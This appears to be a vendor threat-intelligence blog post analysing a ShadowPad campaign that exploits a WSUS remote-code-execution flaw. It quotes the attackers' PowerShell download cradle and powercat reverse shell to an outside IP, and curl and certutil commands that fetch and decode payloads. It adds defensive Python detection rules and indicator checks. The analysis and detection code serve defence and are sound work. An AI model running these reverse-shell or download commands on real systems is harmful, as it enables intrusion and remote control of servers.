Analysis of ShadowPad Attack Exploiting WSUS Remote Code Execution Vulnerability (CVE-2025-59287)


  • Vulnerability Exploitation: CVE-2025-59287, a remote code execution vulnerability in WSUS, is exploited to deploy ShadowPad malware.
  • Malware Deployment: Attackers use legitimate Windows utilities like certutil and curl to install ShadowPad components.
  • Stealthy Backdoor: ShadowPad operates via DLL sideloading, remaining stealthy and persistent.
  • Mitigation Strategies: Timely patching, EDR solutions, network segmentation, and threat intelligence are crucial for defense.
  • PurpleOps Solutions: Cyber Threat Intelligence Platform, breach detection, and other services can help mitigate risks.

Exploiting CVE-2025-59287 to Deploy ShadowPad

This post analyzes an attack leveraging CVE-2025-59287, a remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), to distribute the ShadowPad malware. ShadowPad, a backdoor frequently used by Chinese APT groups, allows attackers to gain persistent access and control over compromised systems. This analysis details the attack chain, ShadowPad’s functionality, and mitigation strategies.

The attack begins by exploiting CVE-2025-59287, a critical vulnerability affecting Windows Servers with WSUS enabled. This vulnerability allows for remote code execution with system-level privileges. Publicly available proof-of-concept (PoC) exploit code has accelerated its adoption by threat actors. The attackers then use PowerCat, a PowerShell-based Netcat utility, to establish a command shell on the target system. Subsequently, they deploy ShadowPad using legitimate Windows utilities like certutil and curl.

This incident underscores the importance of timely patch management and highlights the risks associated with unpatched vulnerabilities, especially in critical infrastructure components like WSUS.

Initial Access via WSUS and Foothold Establishment

Microsoft released a security advisory for CVE-2025-59287 on October 14th. The vulnerability resides in WSUS, a component used to manage and distribute updates within a Windows Server environment. Following the public release of PoC code on October 22nd, evidence of exploitation was observed. Specifically, the execution of PowerCat against vulnerable Windows Server systems was recorded. This suggests the attackers successfully gained access to the command shell (CMD) of the targeted systems.

The PowerShell command used in the initial access phase was:

`powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString ('powercat -c 154.17.26[.]41 -p 8080 -e cmd`

This command downloads and executes PowerCat, establishing a reverse shell connection to the attacker-controlled IP address 154.17.26[.]41 on port 8080, effectively granting remote access to the compromised server.

Malware Installation Process

After gaining initial access, the attackers leveraged CVE-2025-59287 again on November 6th to install ShadowPad. They employed curl.exe and certutil.exe, both legitimate Windows utilities, to download and decode the necessary ShadowPad components.

The commands used for installation are:

* `curl hxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt & curl hxxp://149.28.78[.]189:42306/dll.txt -o C:\users\%ASD%\dll.txt & curl hxxp://149.28.78[.]189:42306/exe.txt -o C:\users\%ASD%\exe.txt`
* `certutil -decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp`

These commands download three files (tmp.txt, dll.txt, and exe.txt) from the attacker’s server and save them to the target system. The `certutil -decode` command then decodes the tmp.txt file, saving the output as 0C137A80.tmp in the C:\programdata\ directory. This decoded file contains the core ShadowPad functionality.
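The PowerCat cradle above and the curl/certutil staging commands in this section share a detectable shape in process-creation telemetry. The following is an added example, not code from the post or from PurpleOps: one rule per living-off-the-land step, run over constructed command lines (the host names, the `svc` user profile and the placeholder download URL are assumptions).

```python
import re

# Constructed sample process-creation events (command-line field only);
# these are not telemetry from the incident. The first three mirror the
# command lines quoted in the post, the last two are benign noise.
SAMPLE_EVENTS = [
    {"host": "wsus01", "cmdline": "powershell.exe -c IEX (New-Object System.Net.WebClient)"
     ".DownloadString('http://stage.invalid/pc.ps1'); powercat -c 154.17.26.41 -p 8080 -e cmd"},
    {"host": "wsus01", "cmdline": "curl http://149.28.78.189:42306/tmp.txt -o C:\\users\\svc\\tmp.txt"
     " & curl http://149.28.78.189:42306/dll.txt -o C:\\users\\svc\\dll.txt"},
    {"host": "wsus01", "cmdline": "certutil -decode C:\\users\\svc\\tmp.txt C:\\programdata\\0C137A80.tmp"},
    {"host": "fs02", "cmdline": "curl https://www.example.com/readme.txt -o C:\\users\\bob\\readme.txt"},
    {"host": "fs02", "cmdline": "certutil -hashfile C:\\users\\bob\\setup.exe SHA256"},
]

# One rule per living-off-the-land step described in the post.
RULES = {
    "ps_download_cradle": re.compile(r"powershell(?:\.exe)?.*\bIEX\b.*DownloadString", re.I),
    "powercat_reverse_shell": re.compile(r"\bpowercat\b.*\s-c\s+\S+.*\s-p\s+\d+.*\s-e\s+cmd", re.I),
    # curl fetching from a bare IP:port URL straight into a user profile
    "curl_ip_download_to_profile": re.compile(
        r"\bcurl(?:\.exe)?\s+https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/\S+\s+-o\s+c:\\users\\", re.I),
    # certutil used as a decoder with the output dropped in ProgramData
    "certutil_decode_to_programdata": re.compile(
        r"\bcertutil(?:\.exe)?\s+-decode\s+\S+\s+c:\\programdata\\", re.I),
}
STAGING_CHAIN = {"curl_ip_download_to_profile", "certutil_decode_to_programdata"}


def classify(cmdline):
    """Names of every rule the command line matches (empty list if benign)."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def hunt(events):
    """Per-host summary: rules that fired and whether the full
    download-then-decode staging chain was observed on that host."""
    per_host = {}
    for ev in events:
        hits = classify(ev["cmdline"])
        if hits:
            per_host.setdefault(ev["host"], set()).update(hits)
    return {host: {"rules": sorted(rules), "staging_chain": STAGING_CHAIN <= rules}
            for host, rules in per_host.items()}


if __name__ == "__main__":
    for host, summary in hunt(SAMPLE_EVENTS).items():
        print(host, summary)
```

Single hits (a lone curl to an IP) are worth a look; a host where the whole staging chain fires is the one to triage first.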

ShadowPad: A Stealthy Backdoor

ShadowPad rarely operates as a standalone executable. It typically relies on DLL sideloading, a technique where a malicious DLL is loaded instead of a legitimate one by exploiting the way Windows searches for DLLs. In this instance, ShadowPad is executed through an EXE and DLL file pair with filenames consistent with previous ShadowPad attacks.

The specific files involved in this attack are:

| Sideloaded DLL Name | DLL MD5 | Legitimate EXE Name | EXE MD5 | TMP File Name | TMP File MD5 |
| :--- | :--- | :--- | :--- | :--- | :--- |
| ETDApix.dll | 27e00b5594530e8c5e004098eef2ec50 | ETDCtrlHelper.exe | 564e7d39a9b6da3cf0da3373351ac717 | 0C137A80.tmp | 85b935e80e84dd47e0fa5e1dfb2c16f4 |

When the legitimate executable (ETDCtrlHelper.exe) is executed, the malicious DLL (ETDApix.dll) acts as the ShadowPad loader, operating entirely in memory. The .tmp file (0C137A80.tmp), located in the same directory, contains the core ShadowPad functionality, including its backdoor configuration data.

Key configuration details observed in this attack are:

| Config Item | Value |
| :--- | :--- |
| Mutex | Q-X64 |
| Service Name | Q-X64 |
| Service Display Name | Q-X64 Service |
| Service Description | Q-X64 Service for windows |
| Persistence Registry Key | SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| Persistence Registry Value | Q-X64 |
| Persistence Name | Q-X64 |
| Task Scheduler Path | Microsoft\Windows\UPnP |
| Task Scheduler Name | Microsoft Corporation |
| Task Scheduler Description | Q-X64 Service for windows |
| Startup Process Path #1 | %ProgramFiles%\Q-X64\Q-X64.exe |
| Startup Process Path #2 | %APPDATA%\Q-X64\Q-X64.exe |
| Startup Process Path #3 | %LOCALAPPDATA%\Q-X64\Q-X64.exe |
| Startup Process Path #4 | %TEMP%\Q-X64\Q-X64.exe |
| Sideloading DLL Name | ETDApix.dll |
| Injection Target Process Path #1 | "%PROGRAMFILES%\Windows Mail\WinMail.exe" Q-X64 |
| Injection Target Process Path #2 | "%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe" Q-X64 |
| Injection Target Process Path #3 | "%ProgramFiles%\Windows Media Player\wmplayer.exe" Q-X64 |
| Injection Target Process Path #4 | "%SystemRoot%\system32\svchost.exe" Q-X64 |
| C&C #1 | |
| C&C #2 | |
| Proxy IP #1 | N/A |
| Proxy IP #2 | N/A |
| Proxy IP #3 | N/A |
| Proxy IP #4 | N/A |
| C&C Header #1 | POST |
| C&C Header #2 | 65536 |
| C&C Header #3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 |
| C&C Header #4 | Accept-Language: en-ca,en;q=0.8,en-us;q=0.6,de-de;q=0.4,de;q=0.2 |
| C&C Header #5 | Accept-Encoding: gzip, deflate |
| C&C Header #6 | Accept: text/html, application/xhtml+xml, image/jxr, */* |
| C&C Header #7 | N/A |
| Forward TCP IP | Registry Required |
| Forward UDP IP | Registry Required |
| Files Registered for Persistence | N/A |

This configuration data reveals ShadowPad’s persistence mechanisms, target processes for injection, and communication protocols for command and control (C&C).
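The persistence names, task path, startup paths and sideloading pair in the table are directly huntable on a host. The following is an added example, not code from the post or from PurpleOps: it matches those indicators against a host artifact snapshot whose layout (Run values, services, scheduled tasks, files, mutexes) and sample contents are assumptions constructed for this example.

```python
# Indicator values taken from the ShadowPad configuration table above.
PERSIST_NAME = "Q-X64"                       # mutex, service and Run value name
TASK_PATH = r"\Microsoft\Windows\UPnP\Microsoft Corporation"
STARTUP_SUFFIX = r"\Q-X64\Q-X64.exe"         # tail shared by all four startup paths
SIDELOAD_EXE, SIDELOAD_DLL = "ETDCtrlHelper.exe", "ETDApix.dll"

# Constructed host snapshot for this example, not data collected in the incident.
SAMPLE_SNAPSHOT = {
    "run_values": {"OneDrive": r"C:\Users\svc\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
                   "Q-X64": r"%APPDATA%\Q-X64\Q-X64.exe"},
    "services": [("wuauserv", "Windows Update"), ("Q-X64", "Q-X64 Service")],
    "tasks": [r"\Microsoft\Windows\UPnP\ExampleBenignTask", TASK_PATH],
    "files": [r"C:\ProgramData\ETDCtrlHelper.exe", r"C:\ProgramData\ETDApix.dll",
              r"C:\ProgramData\0C137A80.tmp", r"C:\Users\svc\AppData\Roaming\Q-X64\Q-X64.exe"],
    "mutexes": ["Q-X64", r"Global\ExampleBenignMutex"],
}


def check_host(snap):
    """Return a list of findings for one host snapshot. Keys: run_values
    {name: command}, services [(name, display)], tasks [task path],
    files [absolute path], mutexes [name]. Matching is case-insensitive."""
    f = []
    for name in snap.get("run_values", {}):
        if name.lower() == PERSIST_NAME.lower():
            f.append(f"Run value '{name}' matches ShadowPad persistence name")
    for name, display in snap.get("services", []):
        if name.lower() == PERSIST_NAME.lower():
            f.append(f"service '{name}' ({display}) matches ShadowPad service name")
    for task in snap.get("tasks", []):
        if task.lower() == TASK_PATH.lower():
            f.append(f"scheduled task '{task}' matches ShadowPad task path and name")
    by_dir = {}
    for path in snap.get("files", []):
        if path.lower().endswith(STARTUP_SUFFIX.lower()):
            f.append(f"ShadowPad startup process path present: {path}")
        d, _, base = path.rpartition("\\")
        by_dir.setdefault(d.lower(), set()).add(base.lower())
    # the loader DLL only matters next to the legitimate EXE that sideloads it
    for d, names in by_dir.items():
        if SIDELOAD_EXE.lower() in names and SIDELOAD_DLL.lower() in names:
            f.append(f"sideload pair {SIDELOAD_EXE} + {SIDELOAD_DLL} co-located in {d}")
    if PERSIST_NAME.lower() in {m.lower() for m in snap.get("mutexes", [])}:
        f.append(f"mutex '{PERSIST_NAME}' present")
    return f
```

Feed it the output of the usual collectors (Run keys, `Get-Service`, `Get-ScheduledTask`, a file listing and a handle dump) and any non-empty result is a host to isolate and image.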

Practical Takeaways

Technical Readers:

* Patch Management: Prioritize patching systems, especially those exposed to the internet or handling sensitive data. Implement a system for promptly applying security updates, focusing on critical vulnerabilities like CVE-2025-59287.
* Endpoint Detection and Response (EDR): Deploy EDR solutions to detect and respond to suspicious activities, such as the execution of unusual processes or the use of legitimate tools (certutil, curl) for malicious purposes.
* Network Segmentation: Implement network segmentation to limit the lateral movement of attackers within the network. Isolate critical systems and services to minimize the impact of a potential breach.
* Monitoring and Alerting: Configure monitoring and alerting systems to detect unusual network traffic, suspicious process executions, and modifications to critical system files or registry keys. Focus on detecting PowerCat execution and unusual use of certutil and curl.
* Threat Intelligence: Utilize cyber threat intelligence platform feeds to stay informed about the latest threats, vulnerabilities, and attack techniques. Leverage this intelligence to proactively identify and mitigate risks.

Non-Technical Readers:

* Understand the Importance of Cybersecurity: Recognize that cybersecurity is not just an IT issue, but a business imperative. Ensure that your organization has a cybersecurity strategy in place and that it is regularly reviewed and updated.
* Support IT Security Initiatives: Provide the necessary resources and support to your IT security team to implement and maintain effective security measures.
* Employee Training: Invest in employee training to raise awareness about phishing, social engineering, and other common attack vectors. Educate employees on how to identify and report suspicious activities.
* Regular Security Assessments: Conduct regular security assessments and penetration testing to identify vulnerabilities and weaknesses in your organization’s security posture.
* Incident Response Plan: Develop and maintain an incident response plan to ensure that your organization can effectively respond to and recover from a security incident.

PurpleOps and Mitigation Strategies

PurpleOps provides a suite of cybersecurity services that can assist organizations in mitigating the risks associated with attacks like the ShadowPad campaign:

* Cyber Threat Intelligence Platform: PurpleOps offers a Cyber Threat Intelligence Platform that provides real-time ransomware intelligence, dark web monitoring service, telegram threat monitoring, live ransomware API, underground forum intelligence, and brand leak alerting. This platform helps organizations stay informed about emerging threats and proactively identify potential risks.
* Breach Detection: PurpleOps’ breach detection services can help organizations identify and respond to security incidents quickly and effectively.
* Supply-Chain Risk Monitoring: PurpleOps provides supply-chain risk monitoring to assess and mitigate the security risks associated with third-party vendors.
* Dark Web Monitoring: PurpleOps’ dark web monitoring service can detect compromised credentials and other sensitive information that may be circulating on the dark web.
* Penetration Testing: Proactive penetration testing helps identify exploitable weaknesses.
* Red Team Operations: Simulate advanced attacks to assess your defense capabilities.

Conclusion

The ShadowPad attack exploiting CVE-2025-59287 demonstrates the speed at which attackers weaponize newly disclosed vulnerabilities. The use of legitimate tools for malicious purposes and the reliance on DLL sideloading techniques highlight the need for layered security defenses, continuous monitoring, and proactive threat intelligence. Organizations must prioritize patching, implement robust endpoint detection and response capabilities, and leverage threat intelligence to stay ahead of evolving threats.

For more information on how PurpleOps can help your organization strengthen its cybersecurity posture, please visit our website at https://www.purple-ops.io/platform/ or contact us at PurpleOps Solutions.

FAQ

Q: What is CVE-2025-59287?

A: CVE-2025-59287 is a remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS).

Q: What is ShadowPad?

A: ShadowPad is a backdoor malware frequently used by Chinese APT groups to gain persistent access and control over compromised systems.

Q: How can I protect my systems from this type of attack?

A: Implement timely patch management, deploy EDR solutions, segment your network, monitor for suspicious activity, and utilize threat intelligence.

Q: What services does PurpleOps offer to help mitigate these risks?

A: PurpleOps offers a Cyber Threat Intelligence Platform, breach detection, supply-chain risk monitoring, dark web monitoring, and penetration testing services.